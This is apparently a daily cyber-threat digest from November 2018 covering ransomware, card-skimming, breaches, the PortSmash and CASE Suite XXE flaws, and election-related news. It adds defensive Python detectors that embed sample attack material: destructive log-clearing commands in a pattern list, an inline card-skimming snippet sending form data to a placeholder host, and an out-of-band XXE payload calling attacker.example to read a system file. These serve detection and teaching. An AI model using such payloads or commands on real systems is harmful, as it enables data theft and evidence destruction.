Threat Reports

Silobreaker Daily Cyber Digest – 05 November 2018

 

Malware

ESC Corporate Services targeted by ransomware  

  • Toronto-based ESC Corporate Services, a licensed provider of access to government records and of government registration and filing services, has been hit by a ransomware attack. The attack was first detected on October 25th, 2018.
  • The affected data includes corporation records, names, addresses, and registrations of liens on automobile, boat and equipment leases.

Source

 

New ransomware discovered installing DiskCryptor

  • The ransomware installs DiskCryptor and reboots the computer. Victims are then shown a ransom note stating that their disk has been encrypted and how they can pay the ransom. DiskCryptor encrypts the whole disk and prompts the user for a password on reboot.
  • MalwareHunterTeam observed that the ransomware is either run manually or called by another script, because it requires a command-line argument, which is used as the DiskCryptor password. The threat actors may also be breaking in via exposed Remote Desktop Services and installing the ransomware by hand.

Source

 

Ongoing Campaigns

F-Secure observes new spam campaign targeting Mac users of Exodus

  • The spam email uses the subject line ‘Update 1.64.1 Release – New Assets and more’ and carries an attachment named ‘Exodus-MacOS-1.64.1-update[.]zip’ that delivers a fake Exodus update.
  • The archive contains an application bundle with a Mach-O binary named ‘rtcfg’. Strings in the binary reference the ‘relatime-spy-mac[.]com’ website, which offers a cloud-based surveillance and remote spy tool that supports both Windows and Mac.

Source

 

Trinity and FBot botnets competing for control over unsecured Android devices

  • The Trinity and FBot botnets are competing directly for control of unsecured Android devices, specifically devices that expose the diagnostic port 5555. The port hosts a standard Android feature, the Android Debug Bridge (ADB), which accepts shell commands from anyone who can reach it when debugging authorization is not enforced.
  • Trinity uses the access to plant a cryptominer on the affected device. The purpose of FBot remains unknown, but it was found to contain code designed specifically to search for Trinity’s file names and remove them.

Source

 

Hacker groups increasingly use log file destruction to hide their attacks

  • Carbon Black released a report based on 113 investigations performed by its incident response partners. It details how attacks carried out by nation-state actors increasingly destroy log data, including antivirus and security logs, to make it harder for incident response teams to access and investigate evidence.

Source
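As an added example of the detection side of this report (written for this digest, not taken from Carbon Black's report), the following Python runs over constructed sample records in the shape of Windows Security/System events and a Linux command record, and flags log destruction both from the events Windows itself writes when a log is cleared (1102 in the Security log, 104 in the System log) and from the command lines that do the clearing. The host names, user names and records are constructed; the event IDs and tool names are the standard ones.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample records (not from any real incident), one dict per event.
SAMPLE_EVENTS: List[Dict] = [
    {"host": "ws01", "channel": "Security", "event_id": 4624, "user": "alice"},
    {"host": "ws01", "channel": "Security", "event_id": 1102, "user": "svc_backup"},   # Security log cleared
    {"host": "ws01", "channel": "System", "event_id": 104, "user": "svc_backup",
     "log_name": "Microsoft-Windows-Windows Defender/Operational"},                   # another log cleared
    {"host": "ws01", "channel": "Security", "event_id": 4688, "user": "svc_backup",
     "process": r"C:\Windows\System32\wevtutil.exe", "command_line": "wevtutil cl Security"},
    {"host": "ws01", "channel": "Security", "event_id": 4688, "user": "bob",
     "process": r"C:\Windows\System32\wevtutil.exe", "command_line": "wevtutil qe System /c:5"},  # benign query
    {"host": "ws01", "channel": "Security", "event_id": 4688, "user": "svc_backup",
     "process": r"C:\Windows\System32\fsutil.exe", "command_line": "fsutil usn deletejournal /D C:"},
    {"host": "srv07", "channel": "auditd", "event_id": 0, "user": "root",
     "process": "/bin/rm", "command_line": "rm -rf /var/log/audit/audit.log /var/log/wtmp"},
]

# Event IDs that directly record a log being cleared (written by Microsoft-Windows-Eventlog)
LOG_CLEARED_EVENTS: Dict[Tuple[str, int], str] = {
    ("Security", 1102): "Security log cleared (Microsoft-Windows-Eventlog 1102)",
    ("System", 104):    "Event log cleared (Microsoft-Windows-Eventlog 104)",
}

# Command-line patterns of common log-destruction tooling
DESTRUCTIVE_COMMANDS = [
    (re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.I), "wevtutil clear-log"),
    (re.compile(r"\bClear-EventLog\b", re.I), "PowerShell Clear-EventLog"),
    (re.compile(r"\bfsutil(\.exe)?\s+usn\s+deletejournal\b", re.I), "USN journal deleted"),
    (re.compile(r"\brm\b.*\s/var/log/", re.I), "Linux log files removed"),
]


def detect_log_tampering(events: List[Dict]) -> List[Dict]:
    """Return one alert per event that clears a log or runs log-destruction tooling."""
    alerts = []
    for ev in events:
        key = (ev.get("channel"), ev.get("event_id"))
        if key in LOG_CLEARED_EVENTS:
            alerts.append({"host": ev["host"], "user": ev.get("user"),
                           "reason": LOG_CLEARED_EVENTS[key],
                           "detail": ev.get("log_name", ev.get("channel"))})
            continue
        cmd = ev.get("command_line", "")
        for pattern, reason in DESTRUCTIVE_COMMANDS:
            if pattern.search(cmd):
                alerts.append({"host": ev["host"], "user": ev.get("user"),
                               "reason": reason, "detail": cmd})
                break
    return alerts


def actors_to_triage(alerts: List[Dict]) -> List[Tuple[str, str]]:
    """(host, user) pairs with more than one tampering alert: where an IR lead starts."""
    counts: Dict[Tuple[str, str], int] = {}
    for a in alerts:
        counts[(a["host"], a["user"])] = counts.get((a["host"], a["user"]), 0) + 1
    return sorted(k for k, n in counts.items() if n > 1)


if __name__ == "__main__":
    found = detect_log_tampering(SAMPLE_EVENTS)
    for alert in found:
        print(alert)
    print("triage:", actors_to_triage(found))
```

A 1102 or 104 record is written into a log the attacker can clear again a moment later, so this logic only helps where events are forwarded off the host as they are written; on an endpoint that keeps logs locally, a Security log that is nearly empty with no 1102 at its head is itself the indicator.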

 

Security researcher analyses compromised e-commerce websites

  • Researcher Brian Krebs has published an in-depth analysis of compromised websites and of the methods attackers use to plant tiny snippets of malicious code on targeted sites that load scripts from hostile domains.
  • Krebs gives the example of card-skimming code placed on asianfoodgrocer[.]com and hosted on the zoobashop[.]com domain. Zoobashop turned out to be a currently hacked e-commerce site based in Ghana that serves a tiny obfuscated script named js[.]js, which steals data entered into online forms.
  • Other examples include malicious domains that mimic the legitimate host domain, for example bargainjunkie[.]com being mimicked by barganljunkie[.]com.

Source  

 

Leaks and Breaches

Magecart malware steals Kitronik’s customers’ data

  • The website of Kitronik, an educational electronics supplier, was compromised by Magecart card-skimming malware. According to the company, the malicious code was present on its website between August and September 2018.
  • The breached data includes customer names, email addresses, card numbers, card expiry dates, CVVs and postal addresses. A company spokesman stated that customers who set up their account before August 2018 are unlikely to have been affected.
  • It is unclear how many individuals were affected.

Source
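The skimmer patterns described in both the Krebs analysis above and the Kitronik compromise here (a script loaded from a foreign host, a lookalike of the shop's own domain, and a small inline snippet that reads form fields and ships them off the page) can be checked for with an added example like the one below, written for this digest rather than taken from Krebs's or Kitronik's tooling. It parses a constructed checkout page with the standard library only; the domains (bargainjunkie.example, barganljunkie.example, zoobashop.example, analytics-vendor.example) are placeholders modelled on the names in the analysis, and the allowlist is an assumption a real site would populate from its own tag inventory.

```python
from html.parser import HTMLParser
from typing import Dict, Iterable, List
from urllib.parse import urlsplit

# Constructed checkout page (not a real site): one first-party script, one allowlisted vendor,
# one lookalike domain, one unknown third party, and an inline snippet that exfiltrates card data.
SAMPLE_PAGE = """
<html><head>
<script src="/static/checkout.js"></script>
<script src="https://static.bargainjunkie.example/cart.js"></script>
<script src="https://tag.analytics-vendor.example/t.js"></script>
<script src="https://barganljunkie.example/jquery.min.js"></script>
<script src="//zoobashop.example/js.js"></script>
<script>
var f = document.forms[0]; var i = new Image();
i.src = "https://zoobashop.example/c?" + btoa(f.card.value);
</script>
</head><body></body></html>
"""
FIRST_PARTY = "bargainjunkie.example"
ALLOWLIST = {"tag.analytics-vendor.example"}   # assumed: hosts the site knowingly loads scripts from


class ScriptCollector(HTMLParser):
    """Collect the src of every <script src=...> and the body of every inline <script>."""

    def __init__(self):
        super().__init__()
        self.external: List[str] = []
        self.inline: List[str] = []
        self._buf = None   # list while inside an inline <script>, else None

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            body = "".join(self._buf).strip()
            if body:
                self.inline.append(body)
            self._buf = None

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch typo-squats such as barganljunkie vs bargainjunkie."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(host: str) -> str:
    """Crude: the label left of the last dot (adequate for .example/.com; use a suffix list in production)."""
    parts = host.lower().split(".")
    return parts[-2] if len(parts) >= 2 else host.lower()


FORM_READS = ("document.forms", "querySelectorAll('input", 'querySelectorAll("input',
              "getElementsByTagName('input", 'getElementsByTagName("input')
EXFIL_SINKS = ("XMLHttpRequest", "fetch(", "new Image", "sendBeacon")


def audit_scripts(html: str, first_party: str, allowlist: Iterable[str]) -> List[Dict]:
    """Flag script hosts that are neither first-party nor allowlisted, lookalike domains, and inline skimmers."""
    collector = ScriptCollector()
    collector.feed(html)
    allowed = {h.lower() for h in allowlist}
    own_label = registrable_label(first_party)
    findings = []
    for src in collector.external:
        host = urlsplit(src if "//" in src else "//" + src).hostname
        if host is None:            # relative path: same origin as the page
            continue
        host = host.lower()
        if host == first_party or host.endswith("." + first_party) or host in allowed:
            continue
        label = registrable_label(host)
        kind = "lookalike-domain" if label != own_label and levenshtein(label, own_label) <= 2 \
            else "unknown-third-party"
        findings.append({"src": src, "host": host, "finding": kind})
    for body in collector.inline:
        if any(k in body for k in FORM_READS) and any(k in body for k in EXFIL_SINKS):
            findings.append({"src": None, "host": None, "finding": "inline-form-exfiltration",
                             "snippet": body[:80]})
    return findings


if __name__ == "__main__":
    for f in audit_scripts(SAMPLE_PAGE, FIRST_PARTY, ALLOWLIST):
        print(f)
```

Run this against a fetched copy of the payment page on a schedule and alert on any change in the findings list; a skimmer like the zoobashop js[.]js appears as a new unknown-third-party host, which is exactly the kind of change a site owner otherwise only learns about from a card brand.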

 

Hackers steal documents on French nuclear power plants and prisons

  • German and French media reported that hackers stole more than 11,000 sensitive files from the French engineering firm Ingerop, covering the locations of video cameras in a high-security prison, a planned nuclear-waste dump, and details of around a thousand Ingerop employees.

Source

 

Data leak of Moscow internet provider Akado Telecom affects thousands of wealthy residents

  • Customers’ personal data, including names, home addresses and mobile phone numbers, was exposed in an international not-for-profit internet registry database.
  • Reuters observed exposed personal data of prominent Russian individuals, including a government official, a film director and a businessman.

Source

 

Vulnerabilities

New Microsoft Edge browser zero-day remote code execution exploit discovered

  • Researchers announced on Twitter on Wednesday that they had compromised Microsoft Edge, offering as proof a screenshot of the browser launching the Windows Calculator app.
  • Researchers Yushi Liang and Alexander Kochkov are working on a stable exploit and on a full sandbox escape. They were also looking for a way to escalate privileges to SYSTEM to gain full control of the machine.

Source

 

New PortSmash side-channel vulnerability discovered

  • PortSmash is a timing attack that leaks information from other processes running on the same physical CPU core when SMT/hyperthreading is enabled: the attacker’s thread measures contention on the core’s execution ports caused by the victim thread. Researchers testing the attack recovered a private key from an OpenSSL thread running on the same core as their exploit.
  • PortSmash was discovered by researchers from the Tampere University of Technology in Finland and the Universidad Tecnologica de la Habana in Cuba. Their findings are described in the paper ‘Port Contention for Fun and Profit’.

Source 1 Source 2

 

Serious vulnerability found in CASE Suite software

  • Researcher Gjoko Krstic discovered a high-severity vulnerability, tracked as CVE-2018-17912, in the CASE Suite building automation software sold by Swiss-based FR. Sauter AG. The flaw affects CASE Suite versions 3.10 and earlier.
  • The vulnerability is an XML external entity (XXE) bug ‘using the DTD parameter entities technique resulting in disclosure and retrieval of arbitrary data on the affected node via [an] out-of-band (OOB) attack’.
  • An attacker can exploit the flaw to read files from the affected system, including configuration data, personal information, account credentials and details about the system and the network hosting it. The flaw has since been patched.

Source
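The quoted description, ‘DTD parameter entities’ and ‘out-of-band’, names the textbook XXE technique. The added example below (written for this digest; it is neither the researcher’s proof of concept nor Sauter’s code) shows the generic shape of such a payload as constructed input, a classifier that reports which DTD features a document uses, and a pre-parse check that rejects any document carrying a DOCTYPE, which is the portable defence when an application never legitimately accepts DTDs. The attacker host, file path and benign document are invented placeholders.

```python
import re
import xml.etree.ElementTree as ET

# Generic out-of-band XXE payload shape (constructed for illustration; not the CASE Suite exploit).
# A vulnerable parser fetches the external parameter entity %dtd from the attacker's host; that DTD
# defines &send; with a SYSTEM URL that embeds %file;, so the file contents leave the host inside a URL.
OOB_XXE_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY % file SYSTEM "file:///C:/Windows/win.ini">
  <!ENTITY % dtd SYSTEM "http://attacker.example/oob.dtd">
  %dtd;
]>
<data>&send;</data>
"""

# Constructed benign document in the style of an application data file (not a real CASE Suite file).
BENIGN_DOCUMENT = b"""<?xml version="1.0"?>
<project name="site-a"><node id="7" type="controller"/></project>
"""

DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.I)
EXTERNAL_ENTITY_RE = re.compile(rb"<!ENTITY\s+%?\s*\w+\s+(SYSTEM|PUBLIC)\b", re.I)
PARAM_ENTITY_REF_RE = re.compile(rb"%\w+;")


def prolog(xml_bytes: bytes) -> bytes:
    """Everything before the root element: the first '<' not followed by '?' (decl/PI) or '!' (DOCTYPE, comment)."""
    m = re.search(rb"<(?![?!])", xml_bytes)
    return xml_bytes if m is None else xml_bytes[:m.start()]


def classify_xml(xml_bytes: bytes) -> dict:
    """Report which DTD features appear in the prolog; useful as a WAF/IDS signal on uploaded XML.

    Restricting the scan to the prolog avoids false positives on element text that merely
    mentions '<!DOCTYPE' or '%name;' inside CDATA.
    """
    head = prolog(xml_bytes)
    return {
        "doctype": DOCTYPE_RE.search(head) is not None,
        "external_entity": EXTERNAL_ENTITY_RE.search(head) is not None,
        "parameter_entity_ref": PARAM_ENTITY_REF_RE.search(head) is not None,
    }


def safe_parse(xml_bytes: bytes) -> ET.Element:
    """Refuse any document with a DOCTYPE before it reaches the XML parser.

    Most application data formats never legitimately need a DTD, so rejecting DTDs outright is
    cheaper and more robust than disabling individual entity features in every parser in use.
    """
    if classify_xml(xml_bytes)["doctype"]:
        raise ValueError("DTD/DOCTYPE not allowed in uploaded XML")
    return ET.fromstring(xml_bytes)


def is_rejected(xml_bytes: bytes) -> bool:
    """True if safe_parse refuses the document, False if it parses."""
    try:
        safe_parse(xml_bytes)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("payload:", classify_xml(OOB_XXE_PAYLOAD), "rejected:", is_rejected(OOB_XXE_PAYLOAD))
    print("benign: ", classify_xml(BENIGN_DOCUMENT), "rejected:", is_rejected(BENIGN_DOCUMENT))
```

Python’s xml.etree does not fetch external entities on its own, but a number of widely used parsers in other languages resolve them by default, so the thing to verify in any fix is either that DOCTYPE is rejected before parsing, as here, or that DTD processing and external entity resolution are disabled in the parser configuration. The presence of an external parameter entity plus a `%name;` reference in the prolog, the pair the classifier reports, is the out-of-band signature worth alerting on at the network edge.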

 

Research from University of California suggests ‘sniffing’ attacks can reveal browser history

  • Modern browsers such as Chrome, Firefox and Edge have vulnerabilities that let a malicious website extract thousands of URLs from a user’s browsing history. The flaws are reportedly rooted in how these browsers handle and render links, so major structural changes would be required to fix them.
  • Tor Browser was the only browser immune to the attacks, because it does not keep track of a user’s browsing history.
  • Lead researcher Michael Smith stated that fixes would take several months to a year to implement.

Source

 

Domain registrar EasyDNS admits to accidentally leaking contact details

  • The leak exposed the contact details of 1,500 domain owners in Whois query results for just over 24 hours. The records include names, phone numbers, email addresses and postal addresses that should have remained private in Whois searches.
  • The information was reportedly exposed by a bug in the back-end system provided by Tucows, which EasyDNS uses to manage domain names. On October 25th Tucows deployed new components that contained the bug.

Source

 

General News

News apps and apps for children found to contain largest amount of third-party trackers

  • Researchers from the University of Oxford studied nearly one million Android apps on the UK and US Google Play Store and found that 90% of them contain at least one third-party tracker. Their findings also show that news apps and apps aimed at children contain the highest numbers of trackers.

Source

 

Brian Kemp’s office launches investigation into alleged hacking attempt by Democratic Party

  • Secretary of State Brian Kemp’s office has stated that it will investigate the Democratic Party over an alleged attempt to hack Georgia’s online voter database.
  • The alleged attempt would have altered voters’ information or removed voters from the registered voter list altogether. So far, no evidence has been provided in support of the claim.

Source

 

Former CIA employee reportedly leaked national defense materials from prison

  • Joshua Adam Schulte was originally arrested for leaking information on the CIA’s hacking tools to WikiLeaks, which he allegedly stole in 2016 while working for the CIA. Federal prosecutors recently issued a further indictment against Schulte, claiming he attempted to continue leaking information from prison, including classified information and search warrant materials.

Source

 

Twitter deletes 10,000 bot accounts discouraging people from voting in US midterms

  • Twitter deleted the accounts, which falsely posed as Democratic Party accounts. The Democratic Congressional Campaign Committee campaigned to have the fraudulent accounts removed as part of its response to bots that had spread false and negative information about the 2016 Democratic presidential candidate Hillary Clinton.

Source

 

Ransomware bundles sold on dark web for cut prices

  • The Samsam ransomware is reportedly included in a bundle of 23 ransomware families, alongside variants such as Magniber, Satan, CryBrazil and XiaoBa. Security firm Sixgill found the bundle on sale for $750; it also includes tutorials and instructions on using the ransomware and on exploiting vulnerabilities such as EternalBlue.

Source

 

The Silobreaker Team

Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.
